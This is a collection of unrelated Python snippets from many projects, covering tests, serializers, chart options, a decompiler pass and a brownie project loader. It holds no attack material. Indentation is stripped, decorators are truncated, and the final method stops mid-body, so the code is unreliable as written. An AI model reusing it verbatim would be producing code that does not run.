.parametrize('term, condition, result', [(LogicCondition.initialize_true(context), logic_x[2].copy(), LogicCondition.initialize_true(context)), (LogicCondition.initialize_false(context), logic_x[2].copy(), LogicCondition.initialize_false(context)), (logic_x[2].copy(), logic_x[2].copy(), LogicCondition.initialize_true(context)), (logic_x[2].copy(), logic_x[3].copy(), logic_x[2].copy()), ((logic_x[2].copy() | logic_x[3].copy()), logic_x[3].copy(), LogicCondition.initialize_true(context))])
def test_substitute_by_true_basics(self, term, condition, result):
assert (term.substitute_by_true(condition) == result)
.parametrize('condition, result', [((((((logic_x[1].copy() | logic_x[2].copy()) | logic_x[3].copy()) & (logic_x[4].copy() | logic_x[5].copy())) & logic_x[6].copy()) & logic_x[7].copy()), LogicCondition.initialize_true(LogicCondition.generate_new_context())), (logic_x[6].copy(), ((((logic_x[1].copy() | logic_x[2].copy()) | logic_x[3].copy()) & (logic_x[4].copy() | logic_x[5].copy())) & logic_x[7].copy())), ((logic_x[4].copy() | logic_x[5].copy()), ((((logic_x[1].copy() | logic_x[2].copy()) | logic_x[3].copy()) & logic_x[6].copy()) & logic_x[7].copy())), ((logic_x[6].copy() & (logic_x[4].copy() | logic_x[5].copy())), (((logic_x[1].copy() | logic_x[2].copy()) | logic_x[3].copy()) & logic_x[7].copy())), ((logic_x[6].copy() & logic_x[7].copy()), (((logic_x[1].copy() | logic_x[2].copy()) | logic_x[3].copy()) & (logic_x[4].copy() | logic_x[5].copy()))), ((logic_x[1].copy() | logic_x[2].copy()), (((logic_x[4].copy() | logic_x[5].copy()) & logic_x[6].copy()) & logic_x[7].copy())), (((((((logic_x[1].copy() | logic_x[2].copy()) | logic_x[3].copy()) & (logic_x[4].copy() | logic_x[5].copy())) & logic_x[6].copy()) & logic_x[7].copy()) & logic_x[8].copy()), LogicCondition.initialize_true(context))])
def test_substitute_by_true(self, condition, result):
term = (((((logic_x[1].copy() | logic_x[2].copy()) | logic_x[3].copy()) & (logic_x[4].copy() | logic_x[5].copy())) & logic_x[6].copy()) & logic_x[7].copy())
term.substitute_by_true(condition)
assert (term == result)
.parametrize('term, conditions, result', [((logic_x[1].copy() & logic_x[2].copy()), [Condition(OperationType.equal, [var_a, constant_5]), Condition(OperationType.less_or_equal_us, [var_a, constant_10])], logic_x[1].copy()), ((logic_x[1].copy() & logic_x[2].copy()), [Condition(OperationType.less, [var_a, constant_5]), Condition(OperationType.less_or_equal_us, [var_a, constant_10])], (logic_x[1].copy() & logic_x[2].copy())), ((logic_x[1].copy() & logic_x[2].copy()), [Condition(OperationType.less, [var_a, constant_20]), Condition(OperationType.less_or_equal_us, [var_a, constant_10])], logic_x[2].copy()), ((logic_x[1].copy() & (~ logic_x[2].copy())), [Condition(OperationType.less, [var_a, constant_20]), Condition(OperationType.greater_us, [var_a, constant_10])], (~ logic_x[2].copy()))])
def test_remove_redundancy(self, term, conditions, result):
class MockConditionHandler(ConditionHandler):
LogicCondition = generate_logic_condition_class(Z3LogicCondition)
PseudoLogicCondition = generate_logic_condition_class(Z3LogicCondition)
def add_condition(self, condition: Condition) -> LogicCondition:
symbol = self._get_next_symbol()
z3_condition = PseudoLogicCondition.initialize_from_condition(condition, self._logic_context)
condition_symbol = ConditionSymbol(condition, symbol, z3_condition)
self._condition_map[symbol] = condition_symbol
return symbol
def _get_next_symbol(self) -> Z3LogicCondition:
self._symbol_counter += 1
return LogicCondition.initialize_symbol(f'x{self._symbol_counter}', self._logic_context)
condition_handler = MockConditionHandler()
condition_handler._logic_context = term.context
for cond in conditions:
condition_handler.add_condition(cond)
term.remove_redundancy(condition_handler)
assert (term == result)
.parametrize('term, bound, result', [(LogicCondition.initialize_true(LogicCondition.generate_new_context()), 100, BoolVal(True)), (LogicCondition.initialize_false(LogicCondition.generate_new_context()), 100, BoolVal(False)), (((((~ logic_x[1].copy()) | logic_x[2].copy()) & (logic_x[3].copy() | (~ logic_x[1].copy()))) & (logic_x[4].copy() | (logic_x[2].copy() & logic_x[3].copy()))), 100, Or(And(z3_symbol[3], z3_symbol[2]), And(z3_symbol[4], Not(z3_symbol[1])))), (((logic_x[2].copy() & (~ logic_x[1].copy())) | (logic_x[3].copy() & (~ logic_x[1].copy()))), 100, And(Or(z3_symbol[2], z3_symbol[3]), Not(z3_symbol[1]))), ((((logic_x[1].copy() | (logic_x[2].copy() & (~ logic_x[1].copy()))) | (logic_x[3].copy() & (~ (logic_x[1].copy() | logic_x[2].copy())))) | ((logic_x[5].copy() & logic_x[4].copy()) & (~ logic_x[1].copy()))), 100, Or(z3_symbol[1], z3_symbol[2], z3_symbol[3], And(z3_symbol[5], z3_symbol[4]))), (((((~ logic_x[1].copy()) | logic_x[2].copy()) & (logic_x[3].copy() | (~ logic_x[1].copy()))) & (logic_x[4].copy() | (logic_x[2].copy() & logic_x[3].copy()))), 5, And(Or(Not(z3_symbol[1]), z3_symbol[2]), Or(z3_symbol[3], Not(z3_symbol[1])), Or(z3_symbol[4], z3_symbol[2]), Or(z3_symbol[4], z3_symbol[3])))])
def test_simplify_to_shortest(self, term, bound, result):
assert term.z3.is_equal(term.simplify_to_shortest(bound)._condition, result)
.parametrize('term, result', [((((logic_x[1].copy() & (~ logic_x[2].copy())) & (logic_x[3].copy() | (~ logic_x[4].copy()))) & (logic_x[5].copy() | (~ logic_x[3].copy()))), '(a < 0x1 & b == 0x2 & (c <= 0x3 | d <= 0x4) & (e >= 0x5 | c > 0x3))'), (((((logic_x[1].copy() | (~ logic_x[2].copy())) & (logic_x[2].copy() | logic_x[5].copy())) & (logic_x[2].copy() | (~ logic_x[4].copy()))) & logic_x[3].copy()), '((a < 0x1 | b == 0x2) & (b != 0x2 | e >= 0x5) & (b != 0x2 | d <= 0x4) & c <= 0x3)')])
def test_rich_string_representation(self, term, result):
condition_map = {logic_x[1].copy(): Condition(OperationType.less, [Variable('a'), Constant(1)]), logic_x[2].copy(): Condition(OperationType.not_equal, [Variable('b'), Constant(2)]), logic_x[3].copy(): Condition(OperationType.less_or_equal, [Variable('c'), Constant(3)]), logic_x[4].copy(): Condition(OperationType.greater, [Variable('d'), Constant(4)]), logic_x[5].copy(): Condition(OperationType.greater_or_equal, [Variable('e'), Constant(5)])}
assert (term.rich_string_representation(condition_map) == result) |
class EntrySetType(Enum):
IN: str = 'in'
INTRA: str = 'intra'
MIXED: str = 'mixed'
OUT: str = 'out'
def has_value(cls, value: str) -> bool:
return (value in _entry_set_type_values)
def get_entry_set_type_from_string(cls, entry_set_type: str) -> Optional['EntrySetType']:
if (not isinstance(entry_set_type, str)):
return None
if (not EntrySetType.has_value(entry_set_type.lower())):
return None
return EntrySetType[entry_set_type.upper()]
def type_check_from_string(cls, name: str, entry_set_type: str) -> 'EntrySetType':
Configuration.type_check_string(name, entry_set_type)
if (not isinstance(entry_set_type, str)):
raise RP2TypeError(f"Parameter '{name}' is not of type string: {entry_set_type}")
result = cls.get_entry_set_type_from_string(entry_set_type)
if (result is None):
raise RP2ValueError(f"Parameter '{name}' has invalid entry set type value: {entry_set_type}")
return result
def type_check(cls, name: str, entry_set_type: 'EntrySetType') -> 'EntrySetType':
Configuration.type_check_parameter_name(name)
if (not isinstance(entry_set_type, cls)):
raise RP2TypeError(f"Parameter '{name}' is not of type {cls.__name__}: {entry_set_type}")
return entry_set_type |
.django_db
def test_double_eclipsing_filters2(client, monkeypatch, elasticsearch_award_index, award_with_tas):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(client, {'require': [_fa_path(BASIC_TAS)], 'exclude': [_agency_path(BASIC_TAS), _tas_path(BASIC_TAS)]})
assert (resp.json()['results'] == []) |
class HoldemPokerScore(Score):
NO_PAIR = 0
PAIR = 1
TWO_PAIR = 2
TRIPS = 3
STRAIGHT = 4
FLUSH = 5
FULL_HOUSE = 6
QUADS = 7
STRAIGHT_FLUSH = 8
def strength(self):
strength = self.category
for offset in range(5):
strength <<= 4
try:
strength += self.cards[offset].rank
except IndexError:
pass
return strength
def cmp(self, other):
if (self.strength < other.strength):
return (- 1)
elif (self.strength > other.strength):
return 1
else:
return 0 |
def test_config_from_str_invalid_section():
config_str = '[a]\nb = null\n\n[a.b]\nc = 1'
with pytest.raises(ConfigValidationError):
Config().from_str(config_str)
config_str = '[a]\nb = null\n\n[a.b.c]\nd = 1'
with pytest.raises(ConfigValidationError):
Config().from_str(config_str) |
class Example(flx.Widget):
persons = flx.TupleProp((), doc=' People to show cards for')
first_name = flx.StringProp('', settable=True)
last_name = flx.StringProp('', settable=True)
def add_person(self, name, info):
ppl = list(self.persons)
ppl.append((name, info))
self._mutate_persons(ppl)
def _button_clicked(self, *events):
self.add_person(self.first_name, self.last_name)
def _render_dom(self):
form_nodes = [flx.create_element('div', {'class': 'form-group mb-2'}, flx.create_element('input', {'class': 'form-control', 'id': 'inputFirstName', 'oninput': (lambda e: self.set_first_name(e.target.value))}, 'First name')), flx.create_element('div', {'class': 'form-group mx-sm-3 mb-2'}, flx.create_element('input', {'class': 'form-control', 'id': 'inputLastName', 'oninput': (lambda e: self.set_last_name(e.target.value))}, 'Last name')), flx.create_element('button', {'class': 'btn btn-primary mb-2', 'onclick': self._button_clicked}, 'Submit')]
card_nodes = []
for (name, info) in self.persons:
person_node = flx.create_element('div', {'class': 'card'}, flx.create_element('div', {'class': 'card-body'}, flx.create_element('h5', {'class': 'card-title'}, name), flx.create_element('p', {'class': 'card-text'}, info)))
card_nodes.append(person_node)
return flx.create_element('div', {}, flx.create_element('div', {'class': 'form-inline'}, form_nodes), *card_nodes) |
class OptionPlotoptionsLineSonificationTracksMappingRate(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
class StridedReshapeCatTestCase(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(StridedReshapeCatTestCase, self).__init__(*args, **kwargs)
self.test_count = 1
def _test_strided_reshape_cat(self, num_cat_ops=1, dtype='float16'):
target = detect_target()
if (int(target._arch) < 80):
_LOGGER.warning('Group Gemm need SM80 HW')
return
M1 = 128
N1 = 32
K1 = 32
M2 = 128
N2 = 8
K2 = 16
M3 = 128
N3 = 16
K3 = 16
BS = 128
Input_M = 2
Input_N = 8
dim = 1
X1 = Tensor(shape=[IntImm(M1), IntImm(K1)], dtype=dtype, name='x1', is_input=True)
W1 = Tensor(shape=[N1, K1], dtype=dtype, name='w1', is_input=True)
X2 = Tensor(shape=[IntImm(M2), IntImm(K2)], dtype=dtype, name='x2', is_input=True)
W2 = Tensor(shape=[N2, K2], dtype=dtype, name='w2', is_input=True)
X3 = Tensor(shape=[IntImm(M3), IntImm(K3)], dtype=dtype, name='x3', is_input=True)
W3 = Tensor(shape=[N3, K3], dtype=dtype, name='w3', is_input=True)
Input = Tensor(shape=[BS, Input_M, Input_N], dtype=dtype, name='input', is_input=True)
group_gemm_op = ops.group_gemm_rcr()
(Y1_orig, Y2_orig, Y3_orig) = group_gemm_op(operand_groups=[[X1, W1], [X2, W2], [X3, W3]])
Y1 = ops.reshape()(Y1_orig, [BS, (- 1), Input_N])
Y2 = ops.unsqueeze(dim)(Y2_orig)
Y3 = ops.reshape()(Y3_orig, [BS, (- 1), Input_N])
Y1._attrs['name'] = 'y1'
Y2._attrs['name'] = 'y2'
Y3._attrs['name'] = 'y3'
if (num_cat_ops == 1):
concat_op = ops.concatenate()
Y = concat_op([Y1, Y2, Input, Y3], dim=dim)
else:
concat_op_1 = ops.concatenate()
concat_op_2 = ops.concatenate()
Y4 = concat_op_1([Y1, Y2], dim=dim)
Y5 = concat_op_2([Input, Y3], dim=dim)
Y6 = ops.reshape()(Y4, [BS, (- 1), Input_N])
Y7 = ops.reshape()(Y5, [BS, (- 1), Input_N])
Y = ops.concatenate()([Y6, Y7], dim=dim)
Y._attrs['name'] = 'y'
Y._attrs['is_output'] = True
dll_name = f'test_{self.test_count}.so'
module = compile_model([Y], target, './tmp', 'strided_reshape_cat', dll_name=dll_name)
Y_src_ops = Y._attrs['src_ops']
if (num_cat_ops == 1):
np.testing.assert_equal(len(Y_src_ops), 2)
np.testing.assert_equal(Y_src_ops, StableSet({group_gemm_op, concat_op}))
np.testing.assert_equal(concat_op._attrs['input_masks'], [False, False, True, False])
else:
Y_src_ops = list(Y_src_ops)
np.testing.assert_equal(len(Y_src_ops), 2)
concat_op = (Y_src_ops[0] if (Y_src_ops[0]._attrs['op'] == 'concatenate') else Y_src_ops[1])
np.testing.assert_equal(concat_op._attrs['input_masks'], [False, False, True, False])
expected_inputs_group_gemm_op = [X1, W1, X2, W2, X3, W3]
np.testing.assert_equal(expected_inputs_group_gemm_op, group_gemm_op._attrs['inputs'])
X1_pt = get_random_torch_tensor([M1, K1], dtype)
W1_pt = get_random_torch_tensor([N1, K1], dtype)
X2_pt = get_random_torch_tensor([M2, K2], dtype)
W2_pt = get_random_torch_tensor([N2, K2], dtype)
X3_pt = get_random_torch_tensor([M3, K3], dtype)
W3_pt = get_random_torch_tensor([N3, K3], dtype)
Input_pt = get_random_torch_tensor([BS, Input_M, Input_N], dtype)
Y1_orig_pt = torch.nn.functional.linear(X1_pt, W1_pt)
Y2_orig_pt = torch.nn.functional.linear(X2_pt, W2_pt)
Y3_orig_pt = torch.nn.functional.linear(X3_pt, W3_pt)
Y1_pt = torch.reshape(Y1_orig_pt, [BS, (- 1), Input_N])
Y2_pt = torch.unsqueeze(Y2_orig_pt, dim)
Y3_pt = torch.reshape(Y3_orig_pt, [BS, (- 1), Input_N])
Y_pt = torch.cat([Y1_pt, Y2_pt, Input_pt, Y3_pt], dim=dim)
y_shape = [var._attrs['values'][0] for var in Y._attrs['shape']]
_LOGGER.info('AITemplate y_shape: {}'.format(y_shape))
np.testing.assert_equal(y_shape, Y_pt.size())
inputs = {'x1': X1_pt, 'w1': W1_pt, 'x2': X2_pt, 'w2': W2_pt, 'x3': X3_pt, 'w3': W3_pt, 'input': Input_pt}
y = get_torch_empty_tensor(y_shape, dtype)
module.run_with_tensors(inputs, [y])
self.assertTrue(torch.allclose(Y_pt, y, atol=0.1, rtol=0.1))
self.test_count += 1
def _test_strided_reshape_cat_bias(self, dtype='float16'):
target = detect_target()
if (int(target._arch) < 80):
_LOGGER.warning('Group Gemm need SM80 HW')
return
M1 = 128
N1 = 32
K1 = 32
M2 = 128
N2 = 8
K2 = 16
BS = 128
Input_M = 2
Input_N = 8
dim = 1
X1 = Tensor(shape=[IntImm(M1), IntImm(K1)], dtype=dtype, name='x1', is_input=True)
W1 = Tensor(shape=[N1, K1], dtype=dtype, name='w1', is_input=True)
B1 = Tensor(shape=[N1], dtype=dtype, name='b1', is_input=True)
X2 = Tensor(shape=[IntImm(M2), IntImm(K2)], dtype=dtype, name='x2', is_input=True)
W2 = Tensor(shape=[N2, K2], dtype=dtype, name='w2', is_input=True)
B2 = Tensor(shape=[N2], dtype=dtype, name='b2', is_input=True)
Input = Tensor(shape=[BS, Input_M, Input_N], dtype=dtype, name='input', is_input=True)
group_gemm_op = ops.group_gemm_rcr_bias()
(Y1_orig, Y2_orig) = group_gemm_op(operand_groups=[[X1, W1, B1], [X2, W2, B2]])
Y1 = ops.reshape()(Y1_orig, [BS, (- 1), Input_N])
Y2 = ops.unsqueeze(dim)(Y2_orig)
Y1._attrs['name'] = 'y1'
Y2._attrs['name'] = 'y2'
concat_op = ops.concatenate()
Y = concat_op([Y1, Y2, Input], dim=dim)
Y._attrs['name'] = 'y'
Y._attrs['is_output'] = True
dll_name = f'test_{self.test_count}.so'
module = compile_model([Y], target, './tmp', 'strided_reshape_cat_bias', dll_name=dll_name)
Y_src_ops = Y._attrs['src_ops']
np.testing.assert_equal(len(Y_src_ops), 2)
np.testing.assert_equal(Y_src_ops, StableSet({group_gemm_op, concat_op}))
np.testing.assert_equal(concat_op._attrs['input_masks'], [False, False, True])
expected_inputs_group_gemm_op = [X1, W1, B1, X2, W2, B2]
np.testing.assert_equal(expected_inputs_group_gemm_op, group_gemm_op._attrs['inputs'])
X1_pt = get_random_torch_tensor([M1, K1], dtype)
W1_pt = get_random_torch_tensor([N1, K1], dtype)
B1_pt = get_random_torch_tensor([N1], dtype)
X2_pt = get_random_torch_tensor([M2, K2], dtype)
W2_pt = get_random_torch_tensor([N2, K2], dtype)
B2_pt = get_random_torch_tensor([N2], dtype)
Input_pt = get_random_torch_tensor([BS, Input_M, Input_N], dtype)
Y1_orig_pt = torch.nn.functional.linear(X1_pt, W1_pt, bias=B1_pt)
Y2_orig_pt = torch.nn.functional.linear(X2_pt, W2_pt, bias=B2_pt)
Y1_pt = torch.reshape(Y1_orig_pt, [BS, (- 1), Input_N])
Y2_pt = torch.unsqueeze(Y2_orig_pt, dim)
Y_pt = torch.cat([Y1_pt, Y2_pt, Input_pt], dim=dim)
y_shape = [var._attrs['values'][0] for var in Y._attrs['shape']]
_LOGGER.info('AITemplate y_shape: {}'.format(y_shape))
np.testing.assert_equal(y_shape, Y_pt.size())
inputs = {'x1': X1_pt, 'w1': W1_pt, 'b1': B1_pt, 'x2': X2_pt, 'w2': W2_pt, 'b2': B2_pt, 'input': Input_pt}
y = get_torch_empty_tensor(y_shape, dtype)
module.run_with_tensors(inputs, [y])
self.assertTrue(torch.allclose(Y_pt, y, atol=0.1, rtol=0.1))
self.test_count += 1
def test_strided_reshape_cat(self):
self._test_strided_reshape_cat()
self._test_strided_reshape_cat(num_cat_ops=2)
self._test_strided_reshape_cat_bias()
((detect_target().name() == 'rocm'), 'Not supported by ROCM.')
def test_strided_reshape_cat_fp32_sm80(self):
self._test_strided_reshape_cat(num_cat_ops=2, dtype='float')
self._test_strided_reshape_cat_bias(dtype='float') |
def downgrade():
op.drop_column('events_version', 'pay_onsite')
op.drop_column('events_version', 'pay_by_stripe')
op.drop_column('events_version', 'pay_by_paypal')
op.drop_column('events_version', 'pay_by_cheque')
op.drop_column('events_version', 'pay_by_bank')
op.drop_column('events', 'pay_onsite')
op.drop_column('events', 'pay_by_stripe')
op.drop_column('events', 'pay_by_paypal')
op.drop_column('events', 'pay_by_cheque')
op.drop_column('events', 'pay_by_bank') |
class OptionSeriesPieStatesInactive(Options):
def animation(self) -> 'OptionSeriesPieStatesInactiveAnimation':
return self._config_sub_data('animation', OptionSeriesPieStatesInactiveAnimation)
def enabled(self):
return self._config_get(True)
def enabled(self, flag: bool):
self._config(flag, js_type=False)
def opacity(self):
return self._config_get(0.2)
def opacity(self, num: float):
self._config(num, js_type=False) |
class VmSerializer(VmBaseSerializer):
hostname = s.Field()
uuid = s.CharField(read_only=True)
alias = s.Field()
node = s.SlugRelatedField(slug_field='hostname', read_only=True, required=False)
owner = s.SlugRelatedField(slug_field='username', read_only=True)
status = s.DisplayChoiceField(choices=Vm.STATUS, read_only=True)
node_status = s.DisplayChoiceField(source='node.status', choices=Node.STATUS_DB, read_only=True)
vcpus = s.IntegerField(read_only=True)
ram = s.IntegerField(read_only=True)
disk = s.IntegerField(read_only=True)
ips = s.ArrayField(read_only=True)
uptime = s.IntegerField(source='uptime_actual', read_only=True)
locked = s.BooleanField(read_only=True) |
class UnitRenderer(DefaultRenderer):
def DrawForeground(self, grid, attr, dc, rect, row, col, isSelected):
dc.SetBackgroundMode(wx.TRANSPARENT)
text = grid.model.GetValue(row, col)
dc.SetFont(self.font)
dc.DrawText(text, (rect.x + 1), (rect.y + 1))
def DrawBackground(self, grid, attr, dc, rect, row, col, isSelected):
dc.SetClippingRegion(rect)
dc.SetBackgroundMode(wx.SOLID)
dc.SetPen(wx.Pen(wx.WHITE, 1, wx.SOLID))
text = grid.model.GetValue(row, col)
if isSelected:
dc.SetBrush(DefaultRenderer.selected_cells)
elif (unit_parser and unit_parser.parse_unit(text).is_valid()):
dc.SetBrush(DefaultRenderer.normal_cells)
else:
dc.SetBrush(DefaultRenderer.error_cells)
dc.DrawRectangle(rect.x, rect.y, rect.width, rect.height)
return |
def generate_histogram_plotly(df, col, num_bins, plot_path):
import plotly.graph_objs as go
import plotly
import codecs
trace = go.Histogram(x=df[col], nbinsx=int(num_bins))
data = [trace]
layout = {'title': (col.capitalize() + ' Histogram')}
fig = go.Figure(data=data, layout=layout)
plotly.offline.plot(fig, filename=plot_path, show_link=False, auto_open=False, include_plotlyjs=False)
with codecs.open(plot_path, 'r') as plot_file:
html = plot_file.read()
return html |
def test_chat_id_str_conversion():
channel_id = '__channel_id__'
chat_id = '__chat_id__'
group_id = '__group_id__'
assert ((channel_id, chat_id, None) == chat_id_str_to_id(chat_id_to_str(channel_id=channel_id, chat_uid=chat_id))), 'Converting channel-chat ID without group ID'
assert ((channel_id, chat_id, group_id) == chat_id_str_to_id(chat_id_to_str(channel_id=channel_id, chat_uid=chat_id, group_id=group_id))), 'Converting channel-chat ID with group ID' |
(private_key_bytes=private_key_st, message_hash=message_hash_st)
def test_signatures_with_high_s(key_api, private_key_bytes, message_hash):
private_key = key_api.PrivateKey(private_key_bytes)
low_s_signature = private_key.sign_msg_hash(message_hash)
assert (coerce_low_s(low_s_signature.s) == low_s_signature.s)
high_s = ((- low_s_signature.s) % SECPK1_N)
assert (coerce_low_s(high_s) == low_s_signature.s)
high_s_signature = key_api.Signature(vrs=(low_s_signature.v, low_s_signature.r, high_s))
assert key_api.ecdsa_verify(message_hash, high_s_signature, private_key.public_key) |
class PhiFunctionLifter():
def __init__(self, cfg: ControlFlowGraph, interference_graph: InterferenceGraph, phi_functions: DefaultDict[(BasicBlock, List[Phi])]):
self._cfg = cfg
self.interference_graph = interference_graph
self._phi_functions_of: DefaultDict[(BasicBlock, List[Phi])] = phi_functions
def lift(self) -> None:
for basic_block in self._phi_functions_of:
self._lift_phi_functions_of(basic_block)
self._remove_phi_instructions_of(basic_block)
def _lift_phi_functions_of(self, basic_block: BasicBlock) -> None:
for predecessor in self._get_predecessors(basic_block):
new_instructions: List[Assignment] = self._compute_instructions_for(predecessor, basic_block)
if (not new_instructions):
continue
edge = self._cfg.get_edge(predecessor, basic_block)
if ((predecessor is not None) and isinstance(edge, UnconditionalEdge)):
predecessor.instructions.extend(new_instructions)
else:
new_basic_block = self._insert_basic_block_before(basic_block, new_instructions)
if predecessor:
self._cfg.substitute_edge(edge, edge.copy(sink=new_basic_block))
else:
self._cfg.root = new_basic_block
self._update_interference_graph_after_lifting(new_instructions)
def _get_predecessors(self, basic_block: BasicBlock) -> Iterator[Optional[BasicBlock]]:
(yield from list(self._cfg.get_predecessors(basic_block)))
if (self._phi_functions_of[basic_block] and (None in self._phi_functions_of[basic_block][0].origin_block)):
(yield None)
def _insert_basic_block_before(self, basic_block: BasicBlock, new_instructions: List[Assignment]) -> BasicBlock:
new_basic_block = self._cfg.create_block(new_instructions)
self._cfg.add_edge(UnconditionalEdge(new_basic_block, basic_block))
return new_basic_block
def _update_interference_graph_after_lifting(self, new_instructions: List[Assignment]) -> None:
assigned_variables = [instruction.destination for instruction in new_instructions[:(- 1)]]
for (number, instruction) in enumerate(new_instructions):
if isinstance(instruction.value, Variable):
for index in range(number):
self.interference_graph.add_edge(assigned_variables[index], instruction.value)
def _compute_instructions_for(self, predecessor: Optional[BasicBlock], basic_block: BasicBlock) -> List[Assignment]:
new_instructions = list()
constant_assignments = list()
defined_variables = set()
for phi_inst in self._phi_functions_of[basic_block]:
definition = phi_inst.definitions[0]
value = phi_inst.origin_block[predecessor]
if (value in defined_variables):
error_message = f'the phi-function {phi_inst} uses value {value} which is defined by a previous Phi-function of the same basic block, therefore, lifting the Phi-functions in this order {self._phi_functions_of[basic_block]} is not correct.'
logging.error(error_message)
raise ValueError(error_message)
defined_variables.add(definition)
if (definition != value):
if isinstance(value, Constant):
constant_assignments.append(Assignment(definition, value))
else:
new_instructions.append(Assignment(definition, value))
return (new_instructions + constant_assignments)
def _remove_phi_instructions_of(self, basic_block: BasicBlock) -> None:
for phi_inst in self._phi_functions_of[basic_block]:
basic_block.remove_instruction(phi_inst) |
class NotebookImportExtractor(ImportExtractor):
def extract_imports(self) -> dict[(str, list[Location])]:
notebook = self._read_ipynb_file(self.file)
if (not notebook):
return {}
cells = self._keep_code_cells(notebook)
import_statements = [self._extract_import_statements_from_cell(cell) for cell in cells]
tree = ast.parse('\n'.join(itertools.chain.from_iterable(import_statements)), str(self.file))
return self._extract_imports_from_ast(tree)
def _read_ipynb_file(cls, path_to_ipynb: Path) -> (dict[(str, Any)] | None):
try:
with path_to_ipynb.open() as ipynb_file:
notebook: dict[(str, Any)] = json.load(ipynb_file)
except ValueError:
try:
with path_to_ipynb.open(encoding=cls._get_file_encoding(path_to_ipynb)) as ipynb_file:
notebook = json.load(ipynb_file, strict=False)
except UnicodeDecodeError:
logging.warning('Warning: File %s could not be decoded. Skipping...', path_to_ipynb)
return None
return notebook
def _keep_code_cells(notebook: dict[(str, Any)]) -> list[dict[(str, Any)]]:
return [cell for cell in notebook['cells'] if (cell['cell_type'] == 'code')]
def _contains_import_statements(line: str) -> bool:
return (re.search('^(?:from\\s+(\\w+)(?:\\.\\w+)?\\s+)?import\\s+([^\\s,.]+)(?:\\.\\w+)?', line) is not None)
def _extract_import_statements_from_cell(cls, cell: dict[(str, Any)]) -> list[str]:
return [line for line in cell['source'] if cls._contains_import_statements(line)] |
class FrameHeader():
def read_header(cls, fp: IOWrapper) -> FrameHeader:
size = fp.read_short('header.size')
payload_type = fp.read_byte('header.payload_type')
reserved1 = fp.read_byte('header.reserved1')
frame_id = fp.read_long('header.id')
reserved2 = fp.read_bytes(8, 'header.reserved2')
return cls(size, payload_type, frame_id)
def __init__(self, size: int=None, payload_type: int=None, frame_id: int=None):
self.size = size
self.payload_type = payload_type
self.id = frame_id |
class Project(_ProjectBase):
def __init__(self, name: str, project_path: Path) -> None:
self._path: Path = project_path
self._envvars = _load_project_envvars(project_path)
self._structure = expand_posix_vars(_load_project_structure_config(project_path), self._envvars)
self._build_path: Path = project_path.joinpath(self._structure['build'])
self._name = name
self._active = False
self.load()
def load(self, raise_if_loaded: bool=True) -> None:
if self._active:
if raise_if_loaded:
raise ProjectAlreadyLoaded('Project is already active')
return None
contract_sources = _load_sources(self._path, self._structure['contracts'], False)
interface_sources = _load_sources(self._path, self._structure['interfaces'], True)
self._sources = Sources(contract_sources, interface_sources)
self._build = Build(self._sources)
contract_list = self._sources.get_contract_list()
potential_dependencies = []
for path in list(self._build_path.glob('contracts/*.json')):
try:
with path.open() as fp:
build_json = json.load(fp)
except json.JSONDecodeError:
build_json = {}
if (not set(BUILD_KEYS).issubset(build_json)):
path.unlink()
continue
if (path.stem not in contract_list):
potential_dependencies.append((path, build_json))
continue
if isinstance(build_json['allSourcePaths'], list):
path.unlink()
test_path = self._build_path.joinpath('tests.json')
if test_path.exists():
test_path.unlink()
continue
if (not self._path.joinpath(build_json['sourcePath']).exists()):
path.unlink()
continue
self._build._add_contract(build_json)
for (path, build_json) in potential_dependencies:
dependents = self._build.get_dependents(path.stem)
is_dependency = (len((set(dependents) & set(contract_list))) > 0)
if is_dependency:
self._build._add_contract(build_json)
else:
path.unlink()
interface_hashes = {}
interface_list = self._sources.get_interface_list()
for path in list(self._build_path.glob('interfaces/*.json')):
try:
with path.open() as fp:
build_json = json.load(fp)
except json.JSONDecodeError:
build_json = {}
if ((not set(INTERFACE_KEYS).issubset(build_json)) or (path.stem not in interface_list)):
path.unlink()
continue
self._build._add_interface(build_json)
interface_hashes[path.stem] = build_json['sha1']
self._compiler_config = expand_posix_vars(_load_project_compiler_config(self._path), self._envvars)
changed = self._get_changed_contracts(interface_hashes)
self._compile(changed, self._compiler_config, False)
self._compile_interfaces(interface_hashes)
self._load_dependency_artifacts()
self._create_containers()
self._load_deployments()
name = self._name
self.__all__ = (list(self._containers) + ['interface'])
sys.modules[f'brownie.project.{name}'] = self
sys.modules['brownie.project'].__dict__[name] = self
sys.modules['brownie.project'].__all__.append(name)
sys.modules['brownie.project'].__console_dir__.append(name)
self._namespaces = [sys.modules['__main__'].__dict__, sys.modules['brownie.project'].__dict__]
_revert_register(self)
self._active = True
_loaded_projects.append(self)
def _get_changed_contracts(self, compiled_hashes: Dict) -> Dict:
new_hashes = self._sources.get_interface_hashes()
for name in [k for (k, v) in new_hashes.items() if (compiled_hashes.get(k, None) != v)]:
self._build._remove_interface(name)
contracts = set((i for i in self._sources.get_contract_list() if self._compare_build_json(i)))
for contract_name in list(contracts):
contracts.update(self._build.get_dependents(contract_name))
for name in contracts:
self._build._remove_contract(name)
changed_set: Set = set((self._sources.get_source_path(i) for i in contracts))
return {i: self._sources.get(i) for i in changed_set}
def _compare_build_json(self, contract_name: str) -> bool:
config = self._compiler_config
try:
source = self._sources.get(contract_name)
build_json = self._build.get(contract_name)
except KeyError:
return True
if (build_json['sha1'] != sha1(source.encode()).hexdigest()):
return True
if (build_json['language'] == 'Solidity'):
solc_config = config['solc'].copy()
solc_config['remappings'] = None
if (not _solidity_compiler_equal(solc_config, build_json['compiler'])):
return True
if (Version(build_json['compiler']['version']) not in get_pragma_spec(source)):
return True
else:
vyper_config = config['vyper'].copy()
if (not _vyper_compiler_equal(vyper_config, build_json['compiler'])):
return True
return False
def _compile_interfaces(self, compiled_hashes: Dict) -> None:
new_hashes = self._sources.get_interface_hashes()
changed_paths = [self._sources.get_source_path(k, True) for (k, v) in new_hashes.items() if (compiled_hashes.get(k, None) != v)]
if (not changed_paths):
return
print('Generating interface ABIs...')
changed_sources = {i: self._sources.get(i) for i in changed_paths}
